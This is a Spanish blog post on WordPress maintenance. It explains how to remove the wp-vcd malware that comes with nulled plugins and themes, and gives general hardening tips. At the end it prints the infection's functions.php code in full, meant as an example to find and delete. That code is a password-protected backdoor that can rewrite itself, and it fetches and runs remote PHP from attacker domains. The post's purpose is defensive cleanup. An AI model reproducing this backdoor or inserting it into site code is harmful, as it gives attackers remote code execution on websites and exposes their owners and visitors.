Mantenimiento pagina web wordpress

Mantenimiento pagina web wordpress

Mantenimiento pagina web wordpress

Mantenimiento pagina web wordpress

 

Mantenimiento pagina web wordpress

 

¿En alguna ocasión haciendo un mantenimiento web os habéis encontrado con un malware?

Yo si y la verdad que al principio no sirve con restaurar copia de seguridad de tu web. ¿Porque? Porque sigue estando la puerta abierta trasera por donde entrar. Entonces ¿que hacemos?.

  • Descargar por FTP todos los archivos.
  • Descargar la base de datos.
  • Descargar sino lo tenéis Sublime.
  • Abrimos Sublime y cargarnos el wordpress en folder.
  • Y empezamos a buscar lineas de código malicioso.

Si encuentras código como el que te voy a poner es porque tienes la web infectada.

Esto suele pasar por descargar plugins o themes desde sitios web no comunes o nulles.

  1. Primero mira en wp-includes y tendrás que borrar los wp-vcd.php y wp-tmp.php
  2. En wp-includes abrimos post.php y borramos  –>  (if (file_exists(dirname(FILE) . ‘/wp-vcd.php’)) include_once(dirname(FILE) . ‘/wp-vcd.php’);)
  3. En funtions.php y borramos este código.
  4. Con esto ya deberías de tener limpio tu wordpress

Datos importantes de mantenimiento pagina web en wordpress.

Es importante tener todos los plugins actualizados y las versión de php + el theme de wordpress.

También hay plugins de seguridad de wordpress que ayudan a combatir todos aquellos ataques producidos por script.

Podéis también poner recapcha en los formularios.

  • Analiza tu web con esta web.
  • Analiza tu web con esta otra web también.
  • Revisa los permisos en las carpetas mediante FTP fuera de 755 o 644 es que hay algo que no va bien si ves 777 a explotado la bomba.
  • Revisa archivos htacces y sus directivas
  • Revisa la tabla en base de datos phpadmin wp_user que no hayan mas user creados que los que tu has creado.
  • Quita wp-admin
  • Quita user admin
  • Cierra puertas como comentarios.
  • Cambia claves de acceso.
  • Pon https
  • Pasale el antivirus de tu pc de normal revisa todo lo malicioso.
  • Instala Wordfence detecta archivos maliciosos y te lo chivara.
    • Te muestra el archivo localizado como sospechoso
    • Te indica el grado de severidad
    • Se facilita detalles del patron de código malicioso que ha encontrado
    • Te facilita herramientas para ver el código del archivo (view the file) y para eliminarlo directamente (Delete this file)
  • Instala plugin Tac para ver las vulnerabilidades de los archivos.
    • Este plugin te ayudará a detectar si tu tema de WordPress tiene código malicioso inyectado en sus archivos. Realmente útil y práctico.

Con esta pequña guia espero que hayas resuelto por lo menos lo mas importante, ya que hay que estar seguros y tener seguros a quienes confían en nosotros y dejan sus tiendas online, paginas web en mantenimiento.

 

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '429acb1c29e4800452a3538a8f91edd0'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='70daf53a6c8b84ec5c45e84e576ae4d2';
if (($tmpcontent = @file_get_contents("http://www.denom.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.denom.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.denom.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif (($tmpcontent = @file_get_contents("http://www.denom.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.denom.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//wp_tmp
//$end_wp_theme_tmp

 

No Comments

Sorry, the comment form is closed at this time.